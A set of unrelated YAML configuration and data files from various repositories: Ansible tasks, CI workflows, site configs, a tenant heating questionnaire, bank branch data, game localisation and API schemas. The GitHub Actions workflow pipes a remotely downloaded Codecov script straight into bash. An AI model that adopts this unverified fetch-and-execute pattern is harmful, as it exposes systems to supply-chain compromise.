group: '{{ item.group | d(item.owner) }}'
mode: '0600'
with_flattened:
- '{{ ssh_private_keys }}'
- '{{ ssh_host_private_keys }}'
- '{{ ssh_group_private_keys }}'
- name: private-keys - Verify Public Key Permissions
file:
path: '{{ item.ssh_key_path | d(ssh_home_path + item.owner + ssh_key_path) }}/{{ item.key_name | d(ssh_key_name) }}.pub'
state: file
owner: '{{ item.owner }}'
group: '{{ item.group | d(item.owner) }}'
mode: '0600'
with_flattened:
- '{{ ssh_private_keys }}'
- '{{ ssh_host_private_keys }}'
- '{{ ssh_group_private_keys }}'
|
tasks/keys/private-keys_default.yml
|
---
- name: "Update Package Cache"
apt: update_cache=yes
when: ansible_os_family == 'Debian'
- name: "Install packages"
package:
name: "{{ required_packages }}"
state: present
- name: "Install Nginx"
import_role:
name: bifrost-nginx-install
tasks_from: install
# NOTE(TheJulia) While we don't necessarilly require /opt/stack any longer
# and it should already be created by the Ansible setup, we will leave this
# here for the time being.
- name: "Ensure /opt/stack is present"
file: name=/opt/stack state=directory owner=root group=root
- name: "IPA-builder - Install"
include_role:
name: bifrost-pip-install
vars:
package: ironic-python-agent-builder
sourcedir: "{{ ipa_builder_git_folder }}"
source_install: true
when: install_dib | bool
# NOTE(mgoddard): IPA-builder has a dependency on diskimage-builder. Install
# DIB last to ensure it is installed from source rather than PyPI.
- name: "Diskimage-builder - Install"
include_role:
name: bifrost-pip-install
vars:
package: diskimage-builder
sourcedir: "{{ dib_git_folder }}"
source_install: true
when: install_dib | bool
- name: Ensure required packages are installed
package:
name: "{{ dib_host_required_packages | select | list }}"
state: present
when: install_dib | bool
- name: "sushy - Install"
include_role:
name: bifrost-pip-install
vars:
package: sushy
sourcedir: "{{ sushy_git_folder }}"
source_install: "{{ sushy_source_install }}"
- name: "Install vendor dependencies"
import_tasks: vendor_deps.yml
- name: "Ironic Client - Install"
include_role:
name: bifrost-pip-install
vars:
package: python-ironicclient
sourcedir: "{{ ironicclient_git_folder }}"
source_install: "{{ ironicclient_source_install }}"
# NOTE(dtantsur): no much value in installing metalsmith from source - it does
# not change often, and nothing in bifrost depends on it.
- name: "metalsmith - Install"
include_role:
name: bifrost-pip-install
vars:
package: metalsmith
source_install: false
- name: "Install pymysql"
include_role:
name: bifrost-pip-install
vars:
package: pymysql
- name: "Install extra packages for ironic"
include_role:
name: bifrost-pip-install
vars:
package: "{{ item }}"
loop: "{{ ironic_extra_packages }}"
- name: "Install Ironic using pip"
include_role:
name: bifrost-pip-install
vars:
package: ironic
sourcedir: "{{ ironic_git_folder }}"
source_install: true
- name: "Install ironic-inspector to permit use of inspection interface"
include_tasks: inspector_install.yml
when: enable_inspector | bool
- name: "Install ironic-staging-drivers"
include_tasks: staging_install.yml
when: staging_drivers_include | bool
- name: "Install openstacksdk"
include_role:
name: bifrost-pip-install
vars:
package: openstacksdk
sourcedir: "{{ openstacksdk_git_folder }}"
source_install: "{{ openstacksdk_source_install }}"
- name: "Install Ironic Prometheus Exporter"
include_tasks: prometheus_exporter_install.yml
when: enable_prometheus_exporter | bool
|
playbooks/roles/bifrost-ironic-install/tasks/install.yml
|
name: post-commit
on:
push:
paths-ignore:
- '**.md'
- 'LICENSE'
jobs:
build:
name: 'Build: ${{ matrix.config.name }} - ${{ matrix.build-type }}'
runs-on: ${{ matrix.config.os }}
strategy:
fail-fast: false
matrix:
config:
- name: Ubuntu - GCC
os: ubuntu-latest
cc: gcc-10
cxx: g++-10
- name: Ubuntu - Clang
os: ubuntu-latest
cc: clang-10
cxx: clang++-10
- name: Windows - MSVC
os: windows-latest
cc: cl
cxx: cl
- name: MacOS - Clang
os: macos-latest
cc: /usr/local/opt/llvm/bin/clang
cxx: /usr/local/opt/llvm/bin/clang++
build-type:
- Debug
- Release
steps:
- name: Checkout
uses: actions/checkout@v2
with:
submodules: recursive
- name: Configure
run: >-
cmake
-B build
-D CMAKE_BUILD_TYPE=${{ matrix.build-type }}
-D CMAKE_C_COMPILER=${{ matrix.config.cc }}
-D CMAKE_CXX_COMPILER=${{ matrix.config.cxx }}
- name: Build
run: cmake --build build --config ${{ matrix.build-type }}
- name: Test
working-directory: build
run: ctest --build-config ${{ matrix.build-type }} --output-on-failure
test-coverage:
name: 'Test Coverage: Ubuntu - GCC'
runs-on: ubuntu-latest
steps:
- name: Install lcov
run: sudo apt-get install lcov
- name: Checkout
uses: actions/checkout@v2
with:
submodules: recursive
- name: Configure
run: >-
cmake
-B build
-D CMAKE_BUILD_TYPE=Debug
-D CMAKE_C_COMPILER=gcc-10
-D CMAKE_CXX_COMPILER=g++-10
-D 'CMAKE_C_FLAGS=--coverage -fno-inline -fno-inline-small-functions -fno-default-inline'
-D 'CMAKE_CXX_FLAGS=--coverage -fno-inline -fno-inline-small-functions -fno-default-inline'
- name: Build
run: cmake --build build
- name: Initialize Coverage Data
run: lcov --capture --initial --directory build --output-file build/base-coverage.info
- name: Test
working-directory: build
run: ctest --build-config Debug --output-on-failure
- name: Generate Coverage Info
run: |
lcov --capture --directory build --output-file build/coverage.info
lcov --add-tracefile build/base-coverage.info --add-tracefile build/coverage.info --output-file build/total-coverage.info
lcov --remove build/total-coverage.info '/usr/*' "$PWD"'/deps/*' --output-file build/total-coverage.info
lcov --list build/total-coverage.info
bash <(curl -s https://codecov.io/bash) -f build/total-coverage.info
|
.github/workflows/post-commit.yml
|
site_name: roel4ez | Blog
site_author: roel4ez
site_url: https://roel4ez.github.io/blog
theme:
name: material
custom_dir: overrides
language: en
palette:
- media: "(prefers-color-scheme: light)"
scheme: default
primary: teal
accent: blue
toggle:
icon: material/toggle-switch-off-outline
name: Switch to dark mode
- media: "(prefers-color-scheme: dark)"
scheme: slate
primary: teal
accent: blue
toggle:
icon: material/toggle-switch
name: Switch to light mode
icon:
repo: fontawesome/brands/github
features:
- navigation.tabs
# - navigation.tabs.sticky
- navigation.sections
#- navigation.indexes
- navigation.top
# - navigation.expand
- navigation.tracking
- search.suggest
- search.highlight
# - header.autohide
# - toc.integrate
repo_name: roel4ez/blog
repo_url: https://github.com/roel4ez/blog
#edit_uri: edit/main/
markdown_extensions:
- admonition
- pymdownx.details
- pymdownx.superfences
- pymdownx.highlight
- pymdownx.inlinehilite
- pymdownx.superfences:
custom_fences:
- name: mermaid
class: mermaid
format: !!python/name:pymdownx.superfences.fence_div_format
- abbr
- pymdownx.snippets
- meta
- toc
- attr_list
- md_in_html
plugins:
- search
- blogging:
features:
tags:
index_page: tags.md
dirs:
- articles
theme:
name: card
- git-revision-date-localized:
type: timeago
enable_creation_date: true
fallback_to_build_date: true
extra_css:
- stylesheets/custom.css
- https://cdn.jsdelivr.net/npm/mermaid/dist/mermaid.css
extra_javascript:
- javascript/extra.js
- https://cdn.jsdelivr.net/npm/mermaid/dist/mermaid.min.js
nav:
- 'Home': index.md
- 'Blog':
- articles/github-action-turn-on-off-vm.md
- articles/mkdocs-mike-ghpages.md
- articles/running-a-project-with-github-projects.md
- tags.md
extra:
social:
- icon: fontawesome/brands/github
link: https://github.com/roel4ez
name: roel4ez on GitHub
- icon: fontawesome/brands/twitter
link: https://twitter.com/roel4ez
name: roel4ez on Twitter
analytics:
provider: google
property: G-Y72V3MRN5X
# disqus: roel4ez-blog
copyright: "Copyright © 2022 roel4ez"
|
mkdocs.yml
|
code: |
if not_enough_heat:
add_problem(1, "Not enough heat")
if has_space_heater:
if improper_space_heater_usage:
add_problem(1, "Improper usage of space heaters")
if not electric_only_space_heaters and not proper_space_heater_venting:
add_problem(30, "Space heater does not vent to a chimney or a vent leading outside")
if not has_written_heating_agreement and landlord_required_heat_payment:
add_problem(30, "Landlord asked tenant to pay for heat without a written agreement stating the tenant must pay for heat")
if not provided_maintained_heating:
add_problem(30, "Landlord failed to provide and/or maintain heating equipment in good order")
seen_heating_season_blurb
if cool_heating_daytime:
add_problem(30, "Temperature dropped below 68 Farenheit between 7 AM and 11 PM")
if cool_heating_nighttime:
add_problem(30, "Temperature dropped below 64 Farenheit between 11 PM and 7 AM")
if over_maximum_allowed_heating:
add_problem(30, "Temperature exceeded 78 Farenheit during the heating season")
heating_completed = True
---
terms:
habitable room: |
Any room that is used for living, sleeping, cooking, or eating
heating season: |
September 16 to June 14
---
question: |
Have you ever not had enough heat?
yesno: not_enough_heat
---
question: |
Do you have any space heaters?
yesno: has_space_heater
---
question: |
Do you use a space heater because the heating system in the building does not work properly?
yesno: improper_space_heater_usage
comment: |
CR edit - https://www.mass.gov/files/documents/2017/09/11/105cmr410.pdf#page=7 (410.200: Heating Facilities Required)(B)
---
question: |
Are all of your space heaters electric?
yesno: electric_only_space_heaters
comment: |
Make this question depend on - Do you have any? How many do you have? How many are electric - choices are based on answer to how many they have
---
question: |
Do your non-electric space heaters vent to a chimney or a vent that leads outdoors?
yesno: proper_space_heater_venting
---
question: |
Have you signed a written agreement with your landlord that says **you** pay for heat?
yesnomaybe: has_written_heating_agreement
comment: |
special case for idk
---
question: |
Has your landlord made you pay for heat?
yesno: landlord_required_heat_payment
---
question: |
Has your landlord provided and maintained heating equipment in good working order?
yesno: provided_maintained_heating
comment: |
Ask this question and then ask the 3 heating season questions all in one so question starts with during the heating season and then
During the day, between 7am and 11pm, has any room been cooler than 68°F
At night, between 11pm and 7, am has any room been cooler than 64°F
Has the temperature ever gone over 78°F ?
---
question: |
About the {heating season}
subquestion: |
Between September 16 and June 14, your landlord must provide
equipment and appliances to heat every {habitable room} and bathroom.
field: seen_heating_season_blurb
---
question: |
During the {heating season},
fields:
- note: <div class="initial-q">has any room been cooler than 68°F between 7 AM and 11 PM?</div>
- no label: cool_heating_daytime
datatype: yesnoradio
- note: <div class="initial-q">has any room been cooler than 64°F between 11 PM and 7 AM?</div>
- no label: cool_heating_nighttime
datatype: yesnoradio
- note: <div class="initial-q">has the temperature ever gone over 78°F ?</div>
- no label: over_maximum_allowed_heating
datatype: yesnoradio
comment: |
Not sure if radio or wide is better here
|
docassemble/evictionHelp/data/questions/bad_conditions_heating.yml
|
---
'001':
code: '001'
name: 本店
kana: ホンテン
hira: ほんてん
roma: honten
'002':
code: '002'
name: 輪西
kana: ワニシ
hira: わにし
roma: wanishi
'003':
code: '003'
name: 母恋
kana: ボコイ
hira: ぼこい
roma: bokoi
'004':
code: '004'
name: 本輪西
kana: モトワニシ
hira: もとわにし
roma: motowanishi
'005':
code: '005'
name: 中島
kana: ナカジマ
hira: なかじま
roma: nakajima
'006':
code: '006'
name: 東町
kana: ヒガシマチ
hira: ひがしまち
roma: higashimachi
'007':
code: '007'
name: 小橋内
kana: オハシナイ
hira: おはしない
roma: ohashinai
'008':
code: '008'
name: 高砂
kana: タカサゴ
hira: たかさご
roma: takasago
'009':
code: '009'
name: 幌別
kana: ホロベツ
hira: ほろべつ
roma: horobetsu
'010':
code: '010'
name: 登別温泉
kana: ノボリベツオンセン
hira: のぼりべつおんせん
roma: noboribetsuonsen
'011':
code: '011'
name: 白老
kana: シラオイ
hira: しらおい
roma: shiraoi
'012':
code: '012'
name: 萩野
kana: ハギノ
hira: はぎの
roma: hagino
'013':
code: '013'
name: 苫小牧
kana: トマコマイ
hira: とまこまい
roma: tomakomai
'014':
code: '014'
name: 札幌
kana: サツポロ
hira: さつぽろ
roma: satsuporo
'015':
code: '015'
name: 白鳥台
kana: ハクチヨウダイ
hira: はくちようだい
roma: hakuchiyoudai
'016':
code: '016'
name: 鷲別
kana: ワシベツ
hira: わしべつ
roma: washibetsu
'017':
code: '017'
name: 苫小牧中央
kana: トマコマイチユウオウ
hira: とまこまいちゆうおう
roma: tomakomaichiyuuou
'018':
code: '018'
name: 札幌北
kana: サツポロキタ
hira: さつぽろきた
roma: satsuporokita
'019':
code: '019'
name: 登別
kana: ノボリベツ
hira: のぼりべつ
roma: noboribetsu
'020':
code: '020'
name: 錦岡
kana: ニシキオカ
hira: にしきおか
roma: nishikioka
'021':
code: '021'
name: 東室蘭駅前
kana: ヒガシムロランエキマエ
hira: ひがしむろらんえきまえ
roma: higashimuroranekimae
'022':
code: '022'
name: 工大前
kana: コウダイマエ
hira: こうだいまえ
roma: koudaimae
'023':
code: '023'
name: 富士町
kana: フジチヨウ
hira: ふじちよう
roma: fujichiyou
'024':
code: '024'
name: 虎杖浜
kana: コジヨウハマ
hira: こじようはま
roma: kojiyouhama
'025':
code: '025'
name: 若草
kana: ワカクサ
hira: わかくさ
roma: wakakusa
'026':
code: '026'
name: 伊達
kana: ダテ
hira: だて
roma: date
'027':
code: '027'
name: イオン登別出張所
kana: イオンノボリベツ
hira: いおんのぼりべつ
roma: ionnoboribetsu
|
data/branches/1003.yml
|
---
alias: bathroom_light_on
initial_state: on
trigger:
- platform: state
entity_id: binary_sensor.bedroom_multisensor_home_security_motion_detected
to: "on"
condition:
- condition: state
entity_id: group.bed_presence
state: "off"
- condition: state
entity_id: light.taklampe_3
state: "off"
action:
- service: light.turn_on
entity_id: light.bedroom_bed_led
- service: light.turn_on
data_template:
entity_id:
- light.bedroom
- light.taklampe_1
- light.taklampe_2
- light.taklampe_3
- light.nightstand_person1
color_temp: >-
{% if is_state("input_select.home_mode", "Dag") %}
{{ states('input_number.home_mode_day_color_temp_value') | int }}
{% elif is_state("input_select.home_mode", "Kveld") %}
{{ states('input_number.home_mode_evening_color_temp_value') | int }}
{% elif is_state("input_select.home_mode", "Natt") %}
{{ states('input_number.home_mode_night_color_temp_value') | int }}
{% else %}
180
{% endif %}
brightness_pct: >-
{% if is_state("input_select.home_mode", "Dag") %}
{{ states('input_number.home_mode_day_brightness_value') | int }}
{% elif is_state("input_select.home_mode", "Kveld") %}
{{ states('input_number.home_mode_evening_brightness_value') | int }}
{% elif is_state("input_select.home_mode", "Natt") %}
{{ states('input_number.home_mode_night_brightness_value') | int }}
{% else %}
100
{% endif %}
transition: >-
{% if is_state("input_select.home_mode", "Dag") %}
{{ states('input_number.home_mode_day_transition_value') | int }}
{% elif is_state("input_select.home_mode", "Kveld") %}
{{ states('input_number.home_mode_evening_transition_value') | int }}
{% elif is_state("input_select.home_mode", "Natt") %}
{{ states('input_number.home_mode_night_transition_value') | int }}
{% else %}
1
{% endif %}
|
automations/house/bedroom_light_on.yaml
|
l_french:
send_poem_interaction:0 "Envoyer un poème"
send_poem_interaction_desc:0 "Envoyez une œuvre personnelle touchante [recipient.Custom('FR_le_Char_Pi')][recipient.GetTitledFirstNameNoTooltip]"
send_poem_interaction.positive_auto_accept.tt:0 "Comme ce poème est positif, [recipient.GetFirstNameNoTooltip] peut l’accepter immédiatement s’il a une [opinion|El] suffisamment élevée de vous"
SEND_POEM_ROMANCE:0 "Une œuvre sur l’amour"
SEND_POEM_MOURNING:0 "Une œuvre sur le deuil"
SEND_POEM_LEGACY:0 "Une œuvre sur l’héritage"
SEND_POEM_STRIFE:0 "Une œuvre sur les conflits"
SEND_POEM_INCOMPETENCE:0 "Une œuvre détaillant son incompétence"
send_poem_interaction.success:0 "Le poème est loué"
send_poem_interaction.failure:0 "Le poème est raillé"
trait_specific_interactions.000.generate_poem:1 "#POE [actor.Custom('GeneratePoem_Title')]#!\n[actor.Custom('GeneratePoem_Intro_Rhyming')]\n[actor.Custom('GeneratePoem_Outro_Rhyming')]"
trait_specific_interactions.000.intro.part1:0 "La dernière œuvre de m[recipient.Custom2('FR_RelationToMe_OnA', SCOPE.sC('actor'))], [actor.Custom('FR_le_Char_Pi')][actor.GetTitledFirstName], fait fureur à la Cour."
trait_specific_interactions.000.intro.part3:0 "et [actor.GetFirstNameNoTooltip] me l’a dédiée publiquement."
trait_specific_interactions.000.outro:0 "Jusqu’à présent, j’ai gardé pour moi ce que j’en pensais, mais l’agitation qu’elle suscite est devenue trop importante pour que je l’ignore plus longtemps."
trait_specific_interactions.0001.t:0 "Quelques mots d’amour"
trait_specific_interactions.0001.desc.intro:0 "$trait_specific_interactions.000.intro.part1$ Elle évoque des sentiments amoureux $trait_specific_interactions.000.intro.part3$"
trait_specific_interactions.0001.desc.poem:0 "\n\n$trait_specific_interactions.000.generate_poem$\n\n"
trait_specific_interactions.0001.desc.outro:0 "$trait_specific_interactions.000.outro$"
trait_specific_interactions.0001.a:0 "Je ne sais pas vraiment quoi penser..."
trait_specific_interactions.0001.b:0 "[actor.GetFirstNameNoTooltip], je vois que c’est vraiment sincère !"
trait_specific_interactions.0001.c:0 "Pff, des inepties !"
trait_specific_interactions.0011.t:0 "Le réconfort dans les écrits"
trait_specific_interactions.0011.desc.intro:0 "$trait_specific_interactions.000.intro.part1$ Elle évoque les sentiments de chagrin et de perte, $trait_specific_interactions.000.intro.part3$"
trait_specific_interactions.0011.desc.poem:0 "\n\n$trait_specific_interactions.000.generate_poem$\n\n"
trait_specific_interactions.0011.desc.outro:0 "$trait_specific_interactions.000.outro$"
trait_specific_interactions.0011.a:0 "$trait_specific_interactions.0001.a$"
trait_specific_interactions.0011.b:0 "$trait_specific_interactions.0001.b$"
trait_specific_interactions.0011.c:0 "$trait_specific_interactions.0001.c$"
trait_specific_interactions.0021.t:0 "Des vers sur l’héritage"
trait_specific_interactions.0021.desc.intro:0 "$trait_specific_interactions.000.intro.part1$ L’œuvre évoque les souvenirs et ce que nous laissons à notre trépas, $trait_specific_interactions.000.intro.part3$"
trait_specific_interactions.0021.desc.poem:0 "\n\n$trait_specific_interactions.000.generate_poem$\n\n"
trait_specific_interactions.0021.desc.outro:0 "$trait_specific_interactions.000.outro$"
trait_specific_interactions.0021.a:0 "$trait_specific_interactions.0001.a$"
trait_specific_interactions.0021.b:0 "$trait_specific_interactions.0001.b$"
trait_specific_interactions.0031.t:0 "La combativité et la gloire"
trait_specific_interactions.0031.desc.intro:0 "$trait_specific_interactions.000.intro.part1$ L’œuvre évoque le succès et la grandeur, $trait_specific_interactions.000.intro.part3$"
trait_specific_interactions.0031.desc.poem:0 "\n\n$trait_specific_interactions.000.generate_poem$\n\n"
trait_specific_interactions.0031.desc.outro:0 "$trait_specific_interactions.000.outro$"
trait_specific_interactions.0031.a:0 "$trait_specific_interactions.0001.a$"
trait_specific_interactions.0031.b:0 "$trait_specific_interactions.0001.b$"
trait_specific_interactions.0041.t:0 "L’ignoble [recipient.GetTitleAsNameNoTooltip|l]"
trait_specific_interactions.0041.desc.intro:0 "$trait_specific_interactions.000.intro.part1$ L’œuvre est désobligeante, provocatrice, et dédiée à moi et à « l’association caractéristique de mon incompétence et de mon incontinence »."
trait_specific_interactions.0041.desc.poem:0 "\n\n$trait_specific_interactions.000.generate_poem$\n\n"
trait_specific_interactions.0041.desc.outro:0 "$trait_specific_interactions.000.outro$"
trait_specific_interactions.0041.a:0 "$trait_specific_interactions.0001.a$"
trait_specific_interactions.0041.b:0 "Hmmm. Oui. #EMP Vraiment. Amusant.#!"
|
project/ck3/base_game/localization/french/event_localization/trait_specific_events/trait_specific_interaction_events_l_french.yml
|
name: RestorePointCollectionUpdate
uid: '@azure/arm-compute.RestorePointCollectionUpdate'
package: '@azure/arm-compute'
summary: Update Restore Point collection parameters.
fullName: RestorePointCollectionUpdate
remarks: ''
isPreview: false
isDeprecated: false
type: interface
properties:
- name: provisioningState
uid: '@azure/arm-compute.RestorePointCollectionUpdate.provisioningState'
package: '@azure/arm-compute'
summary: >-
The provisioning state of the restore point collection.
**NOTE: This property will not be serialized. It can only be populated by
the server.**
fullName: provisioningState
remarks: ''
isPreview: false
isDeprecated: false
syntax:
content: 'provisioningState?: undefined | string'
return:
type: undefined | string
description: ''
- name: restorePointCollectionId
uid: '@azure/arm-compute.RestorePointCollectionUpdate.restorePointCollectionId'
package: '@azure/arm-compute'
summary: >-
The unique id of the restore point collection.
**NOTE: This property will not be serialized. It can only be populated by
the server.**
fullName: restorePointCollectionId
remarks: ''
isPreview: false
isDeprecated: false
syntax:
content: 'restorePointCollectionId?: undefined | string'
return:
type: undefined | string
description: ''
- name: restorePoints
uid: '@azure/arm-compute.RestorePointCollectionUpdate.restorePoints'
package: '@azure/arm-compute'
summary: >-
A list containing all restore points created under this restore point
collection.
**NOTE: This property will not be serialized. It can only be populated by
the server.**
fullName: restorePoints
remarks: ''
isPreview: false
isDeprecated: false
syntax:
content: 'restorePoints?: RestorePoint[]'
return:
type: '<xref uid="@azure/arm-compute.RestorePoint" />[]'
description: ''
- name: source
uid: '@azure/arm-compute.RestorePointCollectionUpdate.source'
package: '@azure/arm-compute'
summary: ''
fullName: source
remarks: ''
isPreview: false
isDeprecated: false
syntax:
content: 'source?: RestorePointCollectionSourceProperties'
return:
type: >-
<xref uid="@azure/arm-compute.RestorePointCollectionSourceProperties"
/>
description: ''
- name: tags
uid: '@azure/arm-compute.RestorePointCollectionUpdate.tags'
package: '@azure/arm-compute'
summary: Resource tags
fullName: tags
remarks: ''
isPreview: false
isDeprecated: false
syntax:
content: 'tags?: undefined | [key: string]: string'
return:
type: 'undefined | [key: string]: string'
description: ''
extends: <xref uid="@azure/arm-compute.UpdateResource" />
|
docs-ref-autogen/@azure/arm-compute/RestorePointCollectionUpdate.yml
|
---
path: /osallistu
title: Osallistu
description: Kehittäjä, kääntäjä, tutkija, suunnittelija, haktivisti tai toimittaja – ota meihin yhteyttä! Citizen OS toivottaa tervetulleiksi kaikki verkkodemokratiasta kiinnostuneet vapaaehtoiset.
keywords:
- kansalaishaktivisti
- verkko-osallistuminen
- hallintoteknologia
image: /assets/images/meta/vision.jpg
blocks:
get-involved-img:
class:
- d-none
- d-sm-block
style:
background: 'linear-gradient(180deg, #0EB7FE 0%, #0680FC 100%)'
min-height: 75vh
get-involved:
#label: About
title: |
Miten voin osallistua?
text: |
Auta meitä kehittämään Citizen OS -alustaa vapaaehtoisena. Olitpa sitten ohjelmistokehittäjä, kääntäjä, tutkija, suunnittelija, haktivisti tai journalisti, tule mukaan!
#### Liity kansalaishaktivistiyhteisöön
Pyöritämme globaalia yhteisöä kansalaisteknologian ja osallistavan demokratian harrastajille. Se tarjoaa tilan tiedon ja ajatusten vaihtoon e-demokratiasta ja yhteistyöhön perustuvasta päätöksenteosta, ja kaikki ovat tervetulleita. [Lisätietoja](/community/).
#### Auta kääntämisessä
Jos Citizen OS -alusta ei vielä ole tuettu omalla kielelläsi ja haluat liittyä vapaaehtoisten kääntäjiemme joukkoon, [ota rohkeasti yhteyttä osoitteeseen <EMAIL>](mailto:<EMAIL>).
Citizen OS -alustan kääntäminen uudelle kielelle on helppoa – monet vapaaehtoiset työskentelevät kanssamme joka päivä. [Tutustu](https://crowdin.com/project/citizenos-fe)!
#### Auta kehittämään avoimen lähdekoodin ohjelmistoa
Oletko ohjelmistokehittäjä tai suunnittelija, jolle online-päätöksenteon tulevaisuus on lähellä sydäntä?
Jos sinulla on parannusehdotuksia tai uusia ominaisuusideoita avoimeen lähdekoodiimme, please [jaa ideasi meille rohkeasti GitHubissa](https://github.com/citizenos).
#### Auta tutkimuksessa
Jos työskentelet e-demokratian parissa, haluaisimme tavata sinut tai julkaista tekstejäsi blogissamme. Ole hyvä ja [lähetä sähköpostia kumppanuusjohtajallemme <NAME>olle osoitteeseen <EMAIL>](mailto:<EMAIL>).
#### Auta muilla tavoilla
Muiden tarjousten tiimoilta [ota yhteyttä kumppanuusjohtajaamme: <EMAIL>](mailto:<EMAIL>).
Jos haluat liittyä tiimiin, voit tutustua avoimiin työpaikkoihimme [täällä](/fi/urat/).
|
source/get-involved/data.fi.yaml
|
# Site settings
# These are used to personalize your new site. If you look in the HTML files,
# you will see them accessed via {{ site.title }}, {{ site.email }}, and so on.
# You can create any custom variable you would like, and they will be accessible
# in the templates via {{ site.myvariable }}.
title: "Joey's Notes | 黄药师的笔记本"
SEOTitle: "Joey's Notes | 黄药师的笔记本"
header-img: img/home-bg.jpg
email: <EMAIL>
description: "积累一些知识和笔记在这里,以供自己和他人参考。摄影和爱猫一样重要,代码的灵性在于生活的感悟。"
keyword: "黄药师, Joey, Notes, 黄药师的笔记本, 博客, 个人网站, 互联网, Ruby, Php, Web, JavaScript, 摄影, 设计"
url: "https://notes.miaowu.org" # your host, for absolute URL
baseurl: "" # for example, '/blog' if your blog hosted on 'host/blog'
encoding: utf-8
future: true
# SNS settings
RSS: false
weibo_username: desiver
zhihu_username: oiahoon
github_username: oiahoon
twitter_username: OiaHoon
facebook_username: oiahoon
linkedin_username: joey-huang-3b88a578
# Build settings
# from 2016, 'pygments' is unsupported on GitHub Pages. Use 'rouge' for highlighting instead.
highlighter: rouge
permalink: pretty
paginate: 10
exclude: ["less","node_modules","Gruntfile.js","package.json","README.md","README.zh.md"]
anchorjs: true # if you want to customize anchor. check out line:181 of `post.html`
# Gems
# from PR#40, to support local preview for Jekyll 3.0
plugins:
- jekyll-paginate
- jekyll-feed
- jekyll-sitemap
- jekyll-seo-tag
# Markdown settings
# replace redcarpet to kramdown,
# although redcarpet can auto highlight code, the lack of header-id make the catalog impossible, so I switch to kramdown
# document: http://jekyllrb.com/docs/configuration/#kramdown
markdown: kramdown
kramdown:
input: GFM # use Github Flavored Markdown !important
# Disqus settings
disqus_username: onice
# Netease setttings
netease_comment: false
# Analytics settings
# Baidu Analytics
# ba_track_id: [your track id]
# Google Analytics
ga_track_id: 'UA-116359540-1' # Format: UA-xxxxxx-xx
ga_domain: notes.miaowu.org
# Sidebar settings
sidebar: true # whether or not using Sidebar.
sidebar-about-description: "不养猫不玩单反,那么代码还有什么灵性呢?"
sidebar-avatar: /img/avatar-joey.jpg # use absolute URL, seeing it's used in both `/` and `/about/`
# Featured Tags
featured-tags: true # whether or not using Feature-Tags
featured-condition-size: 1 # A tag will be featured if the size of it is more than this condition value
# Progressive Web Apps
chrome-tab-theme-color: "#000000"
service-worker: true
# Friends
friends: [
{
title: "超神",
href: "https://zouchao.me/"
},
{
title: "Star Zhou",
href: "https://starzhou.com/"
},
{
title: "ZhongFox",
href: "https://zhongfox.github.io/"
},
{
title: "小涛",
href: "http://chenxiaotao.github.io/"
}
]
|
_config.yml
|
apiVersion: apiextensions.k8s.io/v1
kind: CustomResourceDefinition
metadata:
annotations:
controller-gen.kubebuilder.io/version: (devel)
creationTimestamp: null
name: deeppacketinspections.crd.projectcalico.org
spec:
group: crd.projectcalico.org
names:
kind: DeepPacketInspection
listKind: DeepPacketInspectionList
plural: deeppacketinspections
singular: deeppacketinspection
scope: Namespaced
versions:
- name: v1
schema:
openAPIV3Schema:
properties:
apiVersion:
description: 'APIVersion defines the versioned schema of this representation
of an object. Servers should convert recognized schemas to the latest
internal value, and may reject unrecognized values. More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#resources'
type: string
kind:
description: 'Kind is a string value representing the REST resource this
object represents. Servers may infer this from the endpoint the client
submits requests to. Cannot be updated. In CamelCase. More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#types-kinds'
type: string
metadata:
type: object
spec:
description: DeepPacketInspectionSpec contains the values of the deep
packet inspection.
properties:
selector:
description: "The selector is an expression used to pick out the endpoints
for which deep packet inspection should be performed on. The selector
will only match endpoints in the same namespace as the DeepPacketInspection
resource. \n Selector expressions follow this syntax: \n \tlabel
== \"string_literal\" -> comparison, e.g. my_label == \"foo bar\"
\tlabel != \"string_literal\" -> not equal; also matches if label
is not present \tlabel in { \"a\", \"b\", \"c\", ... } -> true
if the value of label X is one of \"a\", \"b\", \"c\" \tlabel not
in { \"a\", \"b\", \"c\", ... } -> true if the value of label
X is not one of \"a\", \"b\", \"c\" \thas(label_name) -> True if
that label is present \t! expr -> negation of expr \texpr && expr
\ -> Short-circuit and \texpr || expr -> Short-circuit or \t( expr
) -> parens for grouping \tall() or the empty selector -> matches
all endpoints. \n Label names are allowed to contain alphanumerics,
-, _ and /. String literals are more permissive but they do not
support escape characters. \n Examples (with made-up labels): \n
\ttype == \"webserver\" && deployment == \"prod\" \ttype in {\"frontend\",
\"backend\"} \tdeployment != \"dev\" \t! has(label_name)"
type: string
type: object
status:
description: DeepPacketInspectionStatus contains status of deep packet
inspection in each node.
properties:
nodes:
items:
properties:
active:
properties:
lastUpdated:
description: Timestamp of when the active status was last
updated.
format: date-time
type: string
success:
description: Success indicates if deep packet inspection
is running on all workloads matching the selector.
type: boolean
type: object
errorConditions:
items:
properties:
lastUpdated:
description: Timestamp of when this error message was
added.
format: date-time
type: string
message:
description: Message from deep packet inspection error.
type: string
type: object
maxItems: 10
type: array
node:
description: Node identifies with a physical node from the cluster
via its hostname.
type: string
type: object
type: array
type: object
type: object
served: true
storage: true
subresources:
status: {}
status:
acceptedNames:
kind: ""
plural: ""
conditions: []
storedVersions: []
|
pkg/crds/enterprise/crd.projectcalico.org_deeppacketinspections.yaml
|
api_style: contrail
extends:
- base
id: bgp_as_a_service
parents:
project:
description: BGP as service object represents BGP peer in the virtual network
that can participate in dynamic routing with implicit default gateway of the
virtual network.
operations: CRUD
presence: optional
plural: bgp_as_a_services
prefix: /
references:
bgp_router:
description: Reference to internal BGP peer object automatically generated by
the system.
operations: CRUD
presence: system-only
control_node_zone:
$ref: types.json#/definitions/BGPaaSControlNodeZoneAttributes
description: Reference to control-node-zone for bgp-peer selection
operations: CRUD
presence: optional
service_health_check:
description: Reference to health check object attached to BGPaaS object, used
to enable BFD health check over active BGPaaS VMI.
operations: CRUD
presence: optional
virtual_machine_interface:
description: Reference to VMI on which BGPaaS BGP peering will happen.
operations: CRUD
presence: required
schema:
properties:
autonomous_system:
$ref: types.json#/definitions/AutonomousSystemType
description: Autonomous System number for the cluster which is 16 bits by default,
but can be changed to 32 bits by setting enable-4byte-as.
operations: CRUD
presence: required
bgpaas_ip_address:
$ref: types.json#/definitions/IpAddressType
description: Ip address of the BGP peer.
operations: CRUD
presence: required
bgpaas_ipv4_mapped_ipv6_nexthop:
description: True when client bgp implementation expects to receive a ipv4-mapped
ipv6 address (as opposed to regular ipv6 address) as the bgp nexthop for ipv6
routes.
operations: CRUD
presence: optional
type: boolean
